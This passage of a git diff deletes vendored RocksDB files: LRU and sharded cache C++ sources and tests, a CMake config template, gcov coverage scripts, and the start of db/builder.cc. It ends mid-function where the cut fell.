-      LRUHandle* h = list_[i];
-      while (h != nullptr) {
-        auto n = h->next_hash;
-        assert(h->InCache());
-        func(h);
-        h = n;
-      }
-    }
-  }
-
- private:
-  // Return a pointer to slot that points to a cache entry that
-  // matches key/hash.  If there is no such cache entry, return a
-  // pointer to the trailing slot in the corresponding linked list.
-  LRUHandle** FindPointer(const Slice& key, uint32_t hash);
-
-  void Resize();
-
-  // The table consists of an array of buckets where each bucket is
-  // a linked list of cache entries that hash into the bucket.
-  LRUHandle** list_;
-  uint32_t length_;
-  uint32_t elems_;
-};
-
-// A single shard of sharded cache.
-class ALIGN_AS(CACHE_LINE_SIZE) LRUCacheShard : public CacheShard {
- public:
-  LRUCacheShard();
-  virtual ~LRUCacheShard();
-
-  // Separate from constructor so caller can easily make an array of LRUCache
-  // if current usage is more than new capacity, the function will attempt to
-  // free the needed space
-  virtual void SetCapacity(size_t capacity) override;
-
-  // Set the flag to reject insertion if cache if full.
-  virtual void SetStrictCapacityLimit(bool strict_capacity_limit) override;
-
-  // Set percentage of capacity reserved for high-pri cache entries.
-  void SetHighPriorityPoolRatio(double high_pri_pool_ratio);
-
-  // Like Cache methods, but with an extra "hash" parameter.
-  virtual Status Insert(const Slice& key, uint32_t hash, void* value,
-                        size_t charge,
-                        void (*deleter)(const Slice& key, void* value),
-                        Cache::Handle** handle,
-                        Cache::Priority priority) override;
-  virtual Cache::Handle* Lookup(const Slice& key, uint32_t hash) override;
-  virtual bool Ref(Cache::Handle* handle) override;
-  virtual bool Release(Cache::Handle* handle,
-                       bool force_erase = false) override;
-  virtual void Erase(const Slice& key, uint32_t hash) override;
-
-  // Although in some platforms the update of size_t is atomic, to make sure
-  // GetUsage() and GetPinnedUsage() work correctly under any platform, we'll
-  // protect them with mutex_.
-
-  virtual size_t GetUsage() const override;
-  virtual size_t GetPinnedUsage() const override;
-
-  virtual void ApplyToAllCacheEntries(void (*callback)(void*, size_t),
-                                      bool thread_safe) override;
-
-  virtual void EraseUnRefEntries() override;
-
-  virtual std::string GetPrintableOptions() const override;
-
-  void TEST_GetLRUList(LRUHandle** lru, LRUHandle** lru_low_pri);
-
-  //  Retrieves number of elements in LRU, for unit test purpose only
-  //  not threadsafe
-  size_t TEST_GetLRUSize();
-
-  // Overloading to aligned it to cache line size
-  void* operator new(size_t);
-
-  void* operator new[](size_t);
-
-  void operator delete(void *);
-
-  void operator delete[](void*);
-
- private:
-  void LRU_Remove(LRUHandle* e);
-  void LRU_Insert(LRUHandle* e);
-
-  // Overflow the last entry in high-pri pool to low-pri pool until size of
-  // high-pri pool is no larger than the size specify by high_pri_pool_pct.
-  void MaintainPoolSize();
-
-  // Just reduce the reference count by 1.
-  // Return true if last reference
-  bool Unref(LRUHandle* e);
-
-  // Free some space following strict LRU policy until enough space
-  // to hold (usage_ + charge) is freed or the lru list is empty
-  // This function is not thread safe - it needs to be executed while
-  // holding the mutex_
-  void EvictFromLRU(size_t charge, autovector<LRUHandle*>* deleted);
-
-  // Initialized before use.
-  size_t capacity_;
-
-  // Memory size for entries in high-pri pool.
-  size_t high_pri_pool_usage_;
-
-  // Whether to reject insertion if cache reaches its full capacity.
-  bool strict_capacity_limit_;
-
-  // Ratio of capacity reserved for high priority cache entries.
-  double high_pri_pool_ratio_;
-
-  // High-pri pool size, equals to capacity * high_pri_pool_ratio.
-  // Remember the value to avoid recomputing each time.
-  double high_pri_pool_capacity_;
-
-  // Dummy head of LRU list.
-  // lru.prev is newest entry, lru.next is oldest entry.
-  // LRU contains items which can be evicted, ie reference only by cache
-  LRUHandle lru_;
-
-  // Pointer to head of low-pri pool in LRU list.
-  LRUHandle* lru_low_pri_;
-
-  // ------------^^^^^^^^^^^^^-----------
-  // Not frequently modified data members
-  // ------------------------------------
-  //
-  // We separate data members that are updated frequently from the ones that
-  // are not frequently updated so that they don't share the same cache line
-  // which will lead into false cache sharing
-  //
-  // ------------------------------------
-  // Frequently modified data members
-  // ------------vvvvvvvvvvvvv-----------
-  LRUHandleTable table_;
-
-  // Memory size for entries residing in the cache
-  size_t usage_;
-
-  // Memory size for entries residing only in the LRU list
-  size_t lru_usage_;
-
-  // mutex_ protects the following state.
-  // We don't count mutex_ as the cache's internal state so semantically we
-  // don't mind mutex_ invoking the non-const actions.
-  mutable port::Mutex mutex_;
-};
-
-class LRUCache : public ShardedCache {
- public:
-  LRUCache(size_t capacity, int num_shard_bits, bool strict_capacity_limit,
-           double high_pri_pool_ratio);
-  virtual ~LRUCache();
-  virtual const char* Name() const override { return "LRUCache"; }
-  virtual CacheShard* GetShard(int shard) override;
-  virtual const CacheShard* GetShard(int shard) const override;
-  virtual void* Value(Handle* handle) override;
-  virtual size_t GetCharge(Handle* handle) const override;
-  virtual uint32_t GetHash(Handle* handle) const override;
-  virtual void DisownData() override;
-
-  //  Retrieves number of elements in LRU, for unit test purpose only
-  size_t TEST_GetLRUSize();
-
- private:
-  LRUCacheShard* shards_;
-  int num_shards_ = 0;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/cache/lru_cache_test.cc b/thirdparty/rocksdb/cache/lru_cache_test.cc
deleted file mode 100644
index 1b83033..0000000
--- a/thirdparty/rocksdb/cache/lru_cache_test.cc
+++ /dev/null
@@ -1,172 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "cache/lru_cache.h"
-
-#include <string>
-#include <vector>
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-class LRUCacheTest : public testing::Test {
- public:
-  LRUCacheTest() {}
-  ~LRUCacheTest() {}
-
-  void NewCache(size_t capacity, double high_pri_pool_ratio = 0.0) {
-    cache_.reset(
-#if defined(_MSC_VER)
-#pragma warning(push)
-#pragma warning(disable: 4316) // We've validated the alignment with the new operators
-#endif
-      new LRUCacheShard()
-#if defined(_MSC_VER)
-#pragma warning(pop)
-#endif
-    );
-    cache_->SetCapacity(capacity);
-    cache_->SetStrictCapacityLimit(false);
-    cache_->SetHighPriorityPoolRatio(high_pri_pool_ratio);
-  }
-
-  void Insert(const std::string& key,
-              Cache::Priority priority = Cache::Priority::LOW) {
-    cache_->Insert(key, 0 /*hash*/, nullptr /*value*/, 1 /*charge*/,
-                   nullptr /*deleter*/, nullptr /*handle*/, priority);
-  }
-
-  void Insert(char key, Cache::Priority priority = Cache::Priority::LOW) {
-    Insert(std::string(1, key), priority);
-  }
-
-  bool Lookup(const std::string& key) {
-    auto handle = cache_->Lookup(key, 0 /*hash*/);
-    if (handle) {
-      cache_->Release(handle);
-      return true;
-    }
-    return false;
-  }
-
-  bool Lookup(char key) { return Lookup(std::string(1, key)); }
-
-  void Erase(const std::string& key) { cache_->Erase(key, 0 /*hash*/); }
-
-  void ValidateLRUList(std::vector<std::string> keys,
-                       size_t num_high_pri_pool_keys = 0) {
-    LRUHandle* lru;
-    LRUHandle* lru_low_pri;
-    cache_->TEST_GetLRUList(&lru, &lru_low_pri);
-    LRUHandle* iter = lru;
-    bool in_high_pri_pool = false;
-    size_t high_pri_pool_keys = 0;
-    if (iter == lru_low_pri) {
-      in_high_pri_pool = true;
-    }
-    for (const auto& key : keys) {
-      iter = iter->next;
-      ASSERT_NE(lru, iter);
-      ASSERT_EQ(key, iter->key().ToString());
-      ASSERT_EQ(in_high_pri_pool, iter->InHighPriPool());
-      if (in_high_pri_pool) {
-        high_pri_pool_keys++;
-      }
-      if (iter == lru_low_pri) {
-        ASSERT_FALSE(in_high_pri_pool);
-        in_high_pri_pool = true;
-      }
-    }
-    ASSERT_EQ(lru, iter->next);
-    ASSERT_TRUE(in_high_pri_pool);
-    ASSERT_EQ(num_high_pri_pool_keys, high_pri_pool_keys);
-  }
-
- private:
-  std::unique_ptr<LRUCacheShard> cache_;
-};
-
-TEST_F(LRUCacheTest, BasicLRU) {
-  NewCache(5);
-  for (char ch = 'a'; ch <= 'e'; ch++) {
-    Insert(ch);
-  }
-  ValidateLRUList({"a", "b", "c", "d", "e"});
-  for (char ch = 'x'; ch <= 'z'; ch++) {
-    Insert(ch);
-  }
-  ValidateLRUList({"d", "e", "x", "y", "z"});
-  ASSERT_FALSE(Lookup("b"));
-  ValidateLRUList({"d", "e", "x", "y", "z"});
-  ASSERT_TRUE(Lookup("e"));
-  ValidateLRUList({"d", "x", "y", "z", "e"});
-  ASSERT_TRUE(Lookup("z"));
-  ValidateLRUList({"d", "x", "y", "e", "z"});
-  Erase("x");
-  ValidateLRUList({"d", "y", "e", "z"});
-  ASSERT_TRUE(Lookup("d"));
-  ValidateLRUList({"y", "e", "z", "d"});
-  Insert("u");
-  ValidateLRUList({"y", "e", "z", "d", "u"});
-  Insert("v");
-  ValidateLRUList({"e", "z", "d", "u", "v"});
-}
-
-TEST_F(LRUCacheTest, MidPointInsertion) {
-  // Allocate 2 cache entries to high-pri pool.
-  NewCache(5, 0.45);
-
-  Insert("a", Cache::Priority::LOW);
-  Insert("b", Cache::Priority::LOW);
-  Insert("c", Cache::Priority::LOW);
-  ValidateLRUList({"a", "b", "c"}, 0);
-
-  // Low-pri entries can take high-pri pool capacity if available
-  Insert("u", Cache::Priority::LOW);
-  Insert("v", Cache::Priority::LOW);
-  ValidateLRUList({"a", "b", "c", "u", "v"}, 0);
-
-  Insert("X", Cache::Priority::HIGH);
-  Insert("Y", Cache::Priority::HIGH);
-  ValidateLRUList({"c", "u", "v", "X", "Y"}, 2);
-
-  // High-pri entries can overflow to low-pri pool.
-  Insert("Z", Cache::Priority::HIGH);
-  ValidateLRUList({"u", "v", "X", "Y", "Z"}, 2);
-
-  // Low-pri entries will be inserted to head of low-pri pool.
-  Insert("a", Cache::Priority::LOW);
-  ValidateLRUList({"v", "X", "a", "Y", "Z"}, 2);
-
-  // Low-pri entries will be inserted to head of low-pri pool after lookup.
-  ASSERT_TRUE(Lookup("v"));
-  ValidateLRUList({"X", "a", "v", "Y", "Z"}, 2);
-
-  // High-pri entries will be inserted to the head of the list after lookup.
-  ASSERT_TRUE(Lookup("X"));
-  ValidateLRUList({"a", "v", "Y", "Z", "X"}, 2);
-  ASSERT_TRUE(Lookup("Z"));
-  ValidateLRUList({"a", "v", "Y", "X", "Z"}, 2);
-
-  Erase("Y");
-  ValidateLRUList({"a", "v", "X", "Z"}, 2);
-  Erase("X");
-  ValidateLRUList({"a", "v", "Z"}, 1);
-  Insert("d", Cache::Priority::LOW);
-  Insert("e", Cache::Priority::LOW);
-  ValidateLRUList({"a", "v", "d", "e", "Z"}, 1);
-  Insert("f", Cache::Priority::LOW);
-  Insert("g", Cache::Priority::LOW);
-  ValidateLRUList({"d", "e", "f", "g", "Z"}, 1);
-  ASSERT_TRUE(Lookup("d"));
-  ValidateLRUList({"e", "f", "g", "d", "Z"}, 1);
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/cache/sharded_cache.cc b/thirdparty/rocksdb/cache/sharded_cache.cc
deleted file mode 100644
index 9bdea3a..0000000
--- a/thirdparty/rocksdb/cache/sharded_cache.cc
+++ /dev/null
@@ -1,161 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include "cache/sharded_cache.h"
-
-#include <string>
-
-#include "util/mutexlock.h"
-
-namespace rocksdb {
-
-ShardedCache::ShardedCache(size_t capacity, int num_shard_bits,
-                           bool strict_capacity_limit)
-    : num_shard_bits_(num_shard_bits),
-      capacity_(capacity),
-      strict_capacity_limit_(strict_capacity_limit),
-      last_id_(1) {}
-
-void ShardedCache::SetCapacity(size_t capacity) {
-  int num_shards = 1 << num_shard_bits_;
-  const size_t per_shard = (capacity + (num_shards - 1)) / num_shards;
-  MutexLock l(&capacity_mutex_);
-  for (int s = 0; s < num_shards; s++) {
-    GetShard(s)->SetCapacity(per_shard);
-  }
-  capacity_ = capacity;
-}
-
-void ShardedCache::SetStrictCapacityLimit(bool strict_capacity_limit) {
-  int num_shards = 1 << num_shard_bits_;
-  MutexLock l(&capacity_mutex_);
-  for (int s = 0; s < num_shards; s++) {
-    GetShard(s)->SetStrictCapacityLimit(strict_capacity_limit);
-  }
-  strict_capacity_limit_ = strict_capacity_limit;
-}
-
-Status ShardedCache::Insert(const Slice& key, void* value, size_t charge,
-                            void (*deleter)(const Slice& key, void* value),
-                            Handle** handle, Priority priority) {
-  uint32_t hash = HashSlice(key);
-  return GetShard(Shard(hash))
-      ->Insert(key, hash, value, charge, deleter, handle, priority);
-}
-
-Cache::Handle* ShardedCache::Lookup(const Slice& key, Statistics* stats) {
-  uint32_t hash = HashSlice(key);
-  return GetShard(Shard(hash))->Lookup(key, hash);
-}
-
-bool ShardedCache::Ref(Handle* handle) {
-  uint32_t hash = GetHash(handle);
-  return GetShard(Shard(hash))->Ref(handle);
-}
-
-bool ShardedCache::Release(Handle* handle, bool force_erase) {
-  uint32_t hash = GetHash(handle);
-  return GetShard(Shard(hash))->Release(handle, force_erase);
-}
-
-void ShardedCache::Erase(const Slice& key) {
-  uint32_t hash = HashSlice(key);
-  GetShard(Shard(hash))->Erase(key, hash);
-}
-
-uint64_t ShardedCache::NewId() {
-  return last_id_.fetch_add(1, std::memory_order_relaxed);
-}
-
-size_t ShardedCache::GetCapacity() const {
-  MutexLock l(&capacity_mutex_);
-  return capacity_;
-}
-
-bool ShardedCache::HasStrictCapacityLimit() const {
-  MutexLock l(&capacity_mutex_);
-  return strict_capacity_limit_;
-}
-
-size_t ShardedCache::GetUsage() const {
-  // We will not lock the cache when getting the usage from shards.
-  int num_shards = 1 << num_shard_bits_;
-  size_t usage = 0;
-  for (int s = 0; s < num_shards; s++) {
-    usage += GetShard(s)->GetUsage();
-  }
-  return usage;
-}
-
-size_t ShardedCache::GetUsage(Handle* handle) const {
-  return GetCharge(handle);
-}
-
-size_t ShardedCache::GetPinnedUsage() const {
-  // We will not lock the cache when getting the usage from shards.
-  int num_shards = 1 << num_shard_bits_;
-  size_t usage = 0;
-  for (int s = 0; s < num_shards; s++) {
-    usage += GetShard(s)->GetPinnedUsage();
-  }
-  return usage;
-}
-
-void ShardedCache::ApplyToAllCacheEntries(void (*callback)(void*, size_t),
-                                          bool thread_safe) {
-  int num_shards = 1 << num_shard_bits_;
-  for (int s = 0; s < num_shards; s++) {
-    GetShard(s)->ApplyToAllCacheEntries(callback, thread_safe);
-  }
-}
-
-void ShardedCache::EraseUnRefEntries() {
-  int num_shards = 1 << num_shard_bits_;
-  for (int s = 0; s < num_shards; s++) {
-    GetShard(s)->EraseUnRefEntries();
-  }
-}
-
-std::string ShardedCache::GetPrintableOptions() const {
-  std::string ret;
-  ret.reserve(20000);
-  const int kBufferSize = 200;
-  char buffer[kBufferSize];
-  {
-    MutexLock l(&capacity_mutex_);
-    snprintf(buffer, kBufferSize, "    capacity : %" ROCKSDB_PRIszt "\n",
-             capacity_);
-    ret.append(buffer);
-    snprintf(buffer, kBufferSize, "    num_shard_bits : %d\n", num_shard_bits_);
-    ret.append(buffer);
-    snprintf(buffer, kBufferSize, "    strict_capacity_limit : %d\n",
-             strict_capacity_limit_);
-    ret.append(buffer);
-  }
-  ret.append(GetShard(0)->GetPrintableOptions());
-  return ret;
-}
-int GetDefaultCacheShardBits(size_t capacity) {
-  int num_shard_bits = 0;
-  size_t min_shard_size = 512L * 1024L;  // Every shard is at least 512KB.
-  size_t num_shards = capacity / min_shard_size;
-  while (num_shards >>= 1) {
-    if (++num_shard_bits >= 6) {
-      // No more than 6.
-      return num_shard_bits;
-    }
-  }
-  return num_shard_bits;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/cache/sharded_cache.h b/thirdparty/rocksdb/cache/sharded_cache.h
deleted file mode 100644
index 4f9dea2..0000000
--- a/thirdparty/rocksdb/cache/sharded_cache.h
+++ /dev/null
@@ -1,102 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include <atomic>
-#include <string>
-
-#include "port/port.h"
-#include "rocksdb/cache.h"
-#include "util/hash.h"
-
-namespace rocksdb {
-
-// Single cache shard interface.
-class CacheShard {
- public:
-  CacheShard() = default;
-  virtual ~CacheShard() = default;
-
-  virtual Status Insert(const Slice& key, uint32_t hash, void* value,
-                        size_t charge,
-                        void (*deleter)(const Slice& key, void* value),
-                        Cache::Handle** handle, Cache::Priority priority) = 0;
-  virtual Cache::Handle* Lookup(const Slice& key, uint32_t hash) = 0;
-  virtual bool Ref(Cache::Handle* handle) = 0;
-  virtual bool Release(Cache::Handle* handle, bool force_erase = false) = 0;
-  virtual void Erase(const Slice& key, uint32_t hash) = 0;
-  virtual void SetCapacity(size_t capacity) = 0;
-  virtual void SetStrictCapacityLimit(bool strict_capacity_limit) = 0;
-  virtual size_t GetUsage() const = 0;
-  virtual size_t GetPinnedUsage() const = 0;
-  virtual void ApplyToAllCacheEntries(void (*callback)(void*, size_t),
-                                      bool thread_safe) = 0;
-  virtual void EraseUnRefEntries() = 0;
-  virtual std::string GetPrintableOptions() const { return ""; }
-};
-
-// Generic cache interface which shards cache by hash of keys. 2^num_shard_bits
-// shards will be created, with capacity split evenly to each of the shards.
-// Keys are sharded by the highest num_shard_bits bits of hash value.
-class ShardedCache : public Cache {
- public:
-  ShardedCache(size_t capacity, int num_shard_bits, bool strict_capacity_limit);
-  virtual ~ShardedCache() = default;
-  virtual const char* Name() const override = 0;
-  virtual CacheShard* GetShard(int shard) = 0;
-  virtual const CacheShard* GetShard(int shard) const = 0;
-  virtual void* Value(Handle* handle) override = 0;
-  virtual size_t GetCharge(Handle* handle) const = 0;
-  virtual uint32_t GetHash(Handle* handle) const = 0;
-  virtual void DisownData() override = 0;
-
-  virtual void SetCapacity(size_t capacity) override;
-  virtual void SetStrictCapacityLimit(bool strict_capacity_limit) override;
-
-  virtual Status Insert(const Slice& key, void* value, size_t charge,
-                        void (*deleter)(const Slice& key, void* value),
-                        Handle** handle, Priority priority) override;
-  virtual Handle* Lookup(const Slice& key, Statistics* stats) override;
-  virtual bool Ref(Handle* handle) override;
-  virtual bool Release(Handle* handle, bool force_erase = false) override;
-  virtual void Erase(const Slice& key) override;
-  virtual uint64_t NewId() override;
-  virtual size_t GetCapacity() const override;
-  virtual bool HasStrictCapacityLimit() const override;
-  virtual size_t GetUsage() const override;
-  virtual size_t GetUsage(Handle* handle) const override;
-  virtual size_t GetPinnedUsage() const override;
-  virtual void ApplyToAllCacheEntries(void (*callback)(void*, size_t),
-                                      bool thread_safe) override;
-  virtual void EraseUnRefEntries() override;
-  virtual std::string GetPrintableOptions() const override;
-
-  int GetNumShardBits() const { return num_shard_bits_; }
-
- private:
-  static inline uint32_t HashSlice(const Slice& s) {
-    return Hash(s.data(), s.size(), 0);
-  }
-
-  uint32_t Shard(uint32_t hash) {
-    // Note, hash >> 32 yields hash in gcc, not the zero we expect!
-    return (num_shard_bits_ > 0) ? (hash >> (32 - num_shard_bits_)) : 0;
-  }
-
-  int num_shard_bits_;
-  mutable port::Mutex capacity_mutex_;
-  size_t capacity_;
-  bool strict_capacity_limit_;
-  std::atomic<uint64_t> last_id_;
-};
-
-extern int GetDefaultCacheShardBits(size_t capacity);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/cmake/RocksDBConfig.cmake.in b/thirdparty/rocksdb/cmake/RocksDBConfig.cmake.in
deleted file mode 100644
index b3cb2b2..0000000
--- a/thirdparty/rocksdb/cmake/RocksDBConfig.cmake.in
+++ /dev/null
@@ -1,3 +0,0 @@
-@PACKAGE_INIT@
-include("${CMAKE_CURRENT_LIST_DIR}/RocksDBTargets.cmake")
-check_required_components(RocksDB)
diff --git a/thirdparty/rocksdb/coverage/coverage_test.sh b/thirdparty/rocksdb/coverage/coverage_test.sh
deleted file mode 100755
index 6d87ae9..0000000
--- a/thirdparty/rocksdb/coverage/coverage_test.sh
+++ /dev/null
@@ -1,78 +0,0 @@
-#!/usr/bin/env bash
-
-# Exit on error.
-set -e
-
-if [ -n "$USE_CLANG" ]; then
-  echo "Error: Coverage test is supported only for gcc."
-  exit 1
-fi
-
-ROOT=".."
-# Fetch right version of gcov
-if [ -d /mnt/gvfs/third-party -a -z "$CXX" ]; then
-  source $ROOT/build_tools/fbcode_config.sh
-  GCOV=$GCC_BASE/bin/gcov
-else
-  GCOV=$(which gcov)
-fi
-
-COVERAGE_DIR="$PWD/COVERAGE_REPORT"
-mkdir -p $COVERAGE_DIR
-
-# Find all gcno files to generate the coverage report
-
-GCNO_FILES=`find $ROOT -name "*.gcno"`
-$GCOV --preserve-paths --relative-only --no-output $GCNO_FILES 2>/dev/null |
-  # Parse the raw gcov report to more human readable form.
-  python $ROOT/coverage/parse_gcov_output.py |
-  # Write the output to both stdout and report file.
-  tee $COVERAGE_DIR/coverage_report_all.txt &&
-echo -e "Generated coverage report for all files: $COVERAGE_DIR/coverage_report_all.txt\n"
-
-# TODO: we also need to get the files of the latest commits.
-# Get the most recently committed files.
-LATEST_FILES=`
-  git show --pretty="format:" --name-only HEAD |
-  grep -v "^$" |
-  paste -s -d,`
-RECENT_REPORT=$COVERAGE_DIR/coverage_report_recent.txt
-
-echo -e "Recently updated files: $LATEST_FILES\n" > $RECENT_REPORT
-$GCOV --preserve-paths --relative-only --no-output $GCNO_FILES 2>/dev/null |
-  python $ROOT/coverage/parse_gcov_output.py -interested-files $LATEST_FILES |
-  tee -a $RECENT_REPORT &&
-echo -e "Generated coverage report for recently updated files: $RECENT_REPORT\n"
-
-# Unless otherwise specified, we'll not generate html report by default
-if [ -z "$HTML" ]; then
-  exit 0
-fi
-
-# Generate the html report. If we cannot find lcov in this machine, we'll simply
-# skip this step.
-echo "Generating the html coverage report..."
-
-LCOV=$(which lcov || true 2>/dev/null)
-if [ -z $LCOV ]
-then
-  echo "Skip: Cannot find lcov to generate the html report."
-  exit 0
-fi
-
-LCOV_VERSION=$(lcov -v | grep 1.1 || true)
-if [ $LCOV_VERSION ]
-then
-  echo "Not supported lcov version. Expect lcov 1.1."
-  exit 0
-fi
-
-(cd $ROOT; lcov --no-external \
-     --capture  \
-     --directory $PWD \
-     --gcov-tool $GCOV \
-     --output-file $COVERAGE_DIR/coverage.info)
-
-genhtml $COVERAGE_DIR/coverage.info -o $COVERAGE_DIR
-
-echo "HTML Coverage report is generated in $COVERAGE_DIR"
diff --git a/thirdparty/rocksdb/coverage/parse_gcov_output.py b/thirdparty/rocksdb/coverage/parse_gcov_output.py
deleted file mode 100644
index 72e8b07..0000000
--- a/thirdparty/rocksdb/coverage/parse_gcov_output.py
+++ /dev/null
@@ -1,118 +0,0 @@
-import optparse
-import re
-import sys
-
-from optparse import OptionParser
-
-# the gcov report follows certain pattern. Each file will have two lines
-# of report, from which we can extract the file name, total lines and coverage
-# percentage.
-def parse_gcov_report(gcov_input):
-    per_file_coverage = {}
-    total_coverage = None
-
-    for line in sys.stdin:
-        line = line.strip()
-
-        # --First line of the coverage report (with file name in it)?
-        match_obj = re.match("^File '(.*)'$", line)
-        if match_obj:
-            # fetch the file name from the first line of the report.
-            current_file = match_obj.group(1)
-            continue
-
-        # -- Second line of the file report (with coverage percentage)
-        match_obj = re.match("^Lines executed:(.*)% of (.*)", line)
-
-        if match_obj:
-            coverage = float(match_obj.group(1))
-            lines = int(match_obj.group(2))
-
-            if current_file is not None:
-                per_file_coverage[current_file] = (coverage, lines)
-                current_file = None
-            else:
-                # If current_file is not set, we reach the last line of report,
-                # which contains the summarized coverage percentage.
-                total_coverage = (coverage, lines)
-            continue
-
-        # If the line's pattern doesn't fall into the above categories. We
-        # can simply ignore them since they're either empty line or doesn't
-        # find executable lines of the given file.
-        current_file = None
-
-    return per_file_coverage, total_coverage
-
-def get_option_parser():
-    usage = "Parse the gcov output and generate more human-readable code " +\
-            "coverage report."
-    parser = OptionParser(usage)
-
-    parser.add_option(
-        "--interested-files", "-i",
-        dest="filenames",
-        help="Comma separated files names. if specified, we will display " +
-             "the coverage report only for interested source files. " +
-             "Otherwise we will display the coverage report for all " +
-             "source files."
-    )
-    return parser
-
-def display_file_coverage(per_file_coverage, total_coverage):
-    # To print out auto-adjustable column, we need to know the longest
-    # length of file names.
-    max_file_name_length = max(
-        len(fname) for fname in per_file_coverage.keys()
-    )
-
-    # -- Print header
-    # size of separator is determined by 3 column sizes:
-    # file name, coverage percentage and lines.
-    header_template = \
-        "%" + str(max_file_name_length) + "s\t%s\t%s"
-    separator = "-" * (max_file_name_length + 10 + 20)
-    print header_template % ("Filename", "Coverage", "Lines")
-    print separator
-
-    # -- Print body
-    # template for printing coverage report for each file.
-    record_template = "%" + str(max_file_name_length) + "s\t%5.2f%%\t%10d"
-
-    for fname, coverage_info in per_file_coverage.items():
-        coverage, lines = coverage_info
-        print record_template % (fname, coverage, lines)
-
-    # -- Print footer
-    if total_coverage:
-        print separator
-        print record_template % ("Total", total_coverage[0], total_coverage[1])
-
-def report_coverage():
-    parser = get_option_parser()
-    (options, args) = parser.parse_args()
-
-    interested_files = set()
-    if options.filenames is not None:
-        interested_files = set(f.strip() for f in options.filenames.split(','))
-
-    # To make things simple, right now we only read gcov report from the input
-    per_file_coverage, total_coverage = parse_gcov_report(sys.stdin)
-
-    # Check if we need to display coverage info for interested files.
-    if len(interested_files):
-        per_file_coverage = dict(
-            (fname, per_file_coverage[fname]) for fname in interested_files
-            if fname in per_file_coverage
-        )
-        # If we only interested in several files, it makes no sense to report
-        # the total_coverage
-        total_coverage = None
-
-    if not len(per_file_coverage):
-        print >> sys.stderr, "Cannot find coverage info for the given files."
-        return
-    display_file_coverage(per_file_coverage, total_coverage)
-
-if __name__ == "__main__":
-    report_coverage()
diff --git a/thirdparty/rocksdb/db/builder.cc b/thirdparty/rocksdb/db/builder.cc
deleted file mode 100644
index 7cfa780..0000000
--- a/thirdparty/rocksdb/db/builder.cc
+++ /dev/null
@@ -1,227 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/builder.h"
-
-#include <algorithm>
-#include <deque>
-#include <vector>
-
-#include "db/compaction_iterator.h"
-#include "db/dbformat.h"
-#include "db/event_helpers.h"
-#include "db/internal_stats.h"
-#include "db/merge_helper.h"
-#include "db/table_cache.h"
-#include "db/version_edit.h"
-#include "monitoring/iostats_context_imp.h"
-#include "monitoring/thread_status_util.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/options.h"
-#include "rocksdb/table.h"
-#include "table/block_based_table_builder.h"
-#include "table/internal_iterator.h"
-#include "util/file_reader_writer.h"
-#include "util/filename.h"
-#include "util/stop_watch.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-class TableFactory;
-
-TableBuilder* NewTableBuilder(
-    const ImmutableCFOptions& ioptions,
-    const InternalKeyComparator& internal_comparator,
-    const std::vector<std::unique_ptr<IntTblPropCollectorFactory>>*
-        int_tbl_prop_collector_factories,
-    uint32_t column_family_id, const std::string& column_family_name,
-    WritableFileWriter* file, const CompressionType compression_type,
-    const CompressionOptions& compression_opts, int level,
-    const std::string* compression_dict, const bool skip_filters,
-    const uint64_t creation_time, const uint64_t oldest_key_time) {
-  assert((column_family_id ==
-          TablePropertiesCollectorFactory::Context::kUnknownColumnFamily) ==
-         column_family_name.empty());
-  return ioptions.table_factory->NewTableBuilder(
-      TableBuilderOptions(
-          ioptions, internal_comparator, int_tbl_prop_collector_factories,
-          compression_type, compression_opts, compression_dict, skip_filters,
-          column_family_name, level, creation_time, oldest_key_time),
-      column_family_id, file);
-}
-
-Status BuildTable(
-    const std::string& dbname, Env* env, const ImmutableCFOptions& ioptions,
-    const MutableCFOptions& mutable_cf_options, const EnvOptions& env_options,
-    TableCache* table_cache, InternalIterator* iter,
-    std::unique_ptr<InternalIterator> range_del_iter, FileMetaData* meta,
-    const InternalKeyComparator& internal_comparator,
-    const std::vector<std::unique_ptr<IntTblPropCollectorFactory>>*
-        int_tbl_prop_collector_factories,
-    uint32_t column_family_id, const std::string& column_family_name,
-    std::vector<SequenceNumber> snapshots,
-    SequenceNumber earliest_write_conflict_snapshot,
-    const CompressionType compression,
-    const CompressionOptions& compression_opts, bool paranoid_file_checks,
-    InternalStats* internal_stats, TableFileCreationReason reason,
-    EventLogger* event_logger, int job_id, const Env::IOPriority io_priority,
-    TableProperties* table_properties, int level, const uint64_t creation_time,
-    const uint64_t oldest_key_time) {
-  assert((column_family_id ==
-          TablePropertiesCollectorFactory::Context::kUnknownColumnFamily) ==
-         column_family_name.empty());
-  // Reports the IOStats for flush for every following bytes.
